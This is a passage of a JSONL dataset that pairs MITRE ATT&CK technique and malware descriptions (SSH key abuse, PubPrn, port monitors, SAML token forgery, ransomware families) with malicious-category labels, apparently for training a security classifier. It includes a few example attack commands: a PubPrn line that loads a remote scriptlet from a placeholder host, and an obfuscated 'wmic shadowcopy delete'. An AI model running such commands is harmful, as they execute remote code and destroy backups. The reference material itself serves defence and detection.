Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1098.004", "technique_name": "SSH Authorized Keys", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00283", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# route\n\nType: tool\n\n[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "route", "malware_type": "tool"}}]}
{"id": "mitre_00284", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PubPrn\n\nTechnique: T1216.001\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1216.001", "technique_name": "PubPrn", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00285", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Port Monitors\n\nTechnique: T1013\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nA port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1013", "technique_name": "Port Monitors", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00286", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OSX/Shlayer\n\nType: malware\nPlatforms: macOS\n\n[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OSX/Shlayer", "malware_type": "malware"}}]}
{"id": "mitre_00287", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Installer Packages\n\nTechnique: T1546.016\nTactics: privilege-escalation, persistence\nPlatforms: Linux, Windows, macOS\n\nAdversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.016", "technique_name": "Installer Packages", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00288", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Port Monitors\n\nTechnique: T1547.010\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) \n\nAlternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.010", "technique_name": "Port Monitors", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00289", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DDKONG\n\nType: malware\n\n[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DDKONG", "malware_type": "malware"}}]}
{"id": "mitre_00290", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PLAINTEE\n\nType: malware\nPlatforms: Windows\n\n[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PLAINTEE", "malware_type": "malware"}}]}
{"id": "mitre_00291", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Transport Agent\n\nTechnique: T1505.002\nTactics: persistence\nPlatforms: Linux, Windows\n\nAdversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1505.002", "technique_name": "Transport Agent", "tactics": ["persistence"]}}]}
{"id": "mitre_00292", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Remsec\n\nType: malware\nPlatforms: Windows\n\n[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Remsec", "malware_type": "malware"}}]}
{"id": "mitre_00293", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hijack Execution Flow\n\nTechnique: T1574\nTactics: persistence, privilege-escalation, defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1574", "technique_name": "Hijack Execution Flow", "tactics": ["persistence", "privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00294", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Command Obfuscation\n\nTechnique: T1027.010\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.010", "technique_name": "Command Obfuscation", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00295", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# TAMECAT\n\nType: malware\nPlatforms: Windows\n\n[TAMECAT](https://attack.mitre.org/software/S1193) is a malware that is used by [APT42](https://attack.mitre.org/groups/G1044) to execute PowerShell or C# content.(Citation: Mandiant APT42-untangling) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "TAMECAT", "malware_type": "malware"}}]}
{"id": "mitre_00296", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Moneybird\n\nType: malware\nPlatforms: Windows\n\n[Moneybird](https://attack.mitre.org/software/S1137) is a ransomware variant written in C++ associated with [Agrius](https://attack.mitre.org/groups/G1030) operations. The name \"Moneybird\" is contained in the malware's ransom note and as strings in the executable.(Citation: CheckPoint Agrius 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Moneybird", "malware_type": "malware"}}]}
{"id": "mitre_00297", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SOUNDBITE\n\nType: malware\nPlatforms: Windows\n\n[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SOUNDBITE", "malware_type": "malware"}}]}
{"id": "mitre_00298", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Financial Theft\n\nTechnique: T1657\nTactics: impact\nPlatforms: Linux, macOS, Office Suite, SaaS, Windows\n\nAdversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1657", "technique_name": "Financial Theft", "tactics": ["impact"]}}]}
{"id": "mitre_00299", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Visual Basic\n\nTechnique: T1059.005\nTactics: execution\nPlatforms: Linux, macOS, Windows\n\nAdversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1059.005", "technique_name": "Visual Basic", "tactics": ["execution"]}}]}
{"id": "mitre_00300", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Firmware\n\nTechnique: T1592.003\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1592.003", "technique_name": "Firmware", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00301", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Delay Execution\n\nTechnique: T1678\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems. \n\nAdversaries may utilize programmatic `sleep` commands or native system scheduling functionality, for example [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053). Benign commands or other operations may also be used to delay malware execution or ensure prior commands have had time to execute properly. Loops or otherwise needless repetitions of commands, such as `ping`, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1678", "technique_name": "Delay Execution", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00302", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Install Digital Certificate\n\nTechnique: T1608.003\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1608.003", "technique_name": "Install Digital Certificate", "tactics": ["resource-development"]}}]}
{"id": "mitre_00303", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exfiltration Over Unencrypted Non-C2 Protocol\n\nTechnique: T1048.003\nTactics: exfiltration\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1048.003", "technique_name": "Exfiltration Over Unencrypted Non-C2 Protocol", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00304", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Malicious Link\n\nTechnique: T1204.001\nTactics: execution\nPlatforms: Linux, macOS, Windows\n\nAn adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1204.001", "technique_name": "Malicious Link", "tactics": ["execution"]}}]}
{"id": "mitre_00305", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SAML Tokens\n\nTechnique: T1606.002\nTactics: credential-access\nPlatforms: SaaS, Windows, IaaS, Office Suite, Identity Provider\n\nAn adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1606.002", "technique_name": "SAML Tokens", "tactics": ["credential-access"]}}]}
{"id": "mitre_00306", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Spark\n\nType: malware\nPlatforms: Windows\n\n\n[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Spark", "malware_type": "malware"}}]}
{"id": "mitre_00307", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SocGholish\n\nType: malware\nPlatforms: Windows\n\n[SocGholish](https://attack.mitre.org/software/S1124) is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by [Mustard Tempest](https://attack.mitre.org/groups/G1020) and its access has been sold to groups including [Indrik Spider](https://attack.mitre.org/groups/G0119) for downloading secondary RAT and ransomware payloads.(Citation: SentinelOne SocGholish Infrastructure November 2022)(Citation: SocGholish-update)(Citation: Red Canary SocGholish March 2024)(Citation: Secureworks Gold Prelude Profile) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SocGholish", "malware_type": "malware"}}]}
{"id": "mitre_00308", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BlackCat\n\nType: malware\nPlatforms: Linux, Windows\n\n[BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BlackCat", "malware_type": "malware"}}]}
{"id": "mitre_00309", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Elevated Execution with Prompt\n\nTechnique: T1514\nTactics: privilege-escalation\nPlatforms: macOS\n\nAdversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1514", "technique_name": "Elevated Execution with Prompt", "tactics": ["privilege-escalation"]}}]}
{"id": "mitre_00310", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rover\n\nType: malware\nPlatforms: Windows\n\n[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Rover", "malware_type": "malware"}}]}
{"id": "mitre_00311", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Email Accounts\n\nTechnique: T1585.002\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services \u2013 such as trial periods \u2013 to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)\n\nAdversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1585.002", "technique_name": "Email Accounts", "tactics": ["resource-development"]}}]}
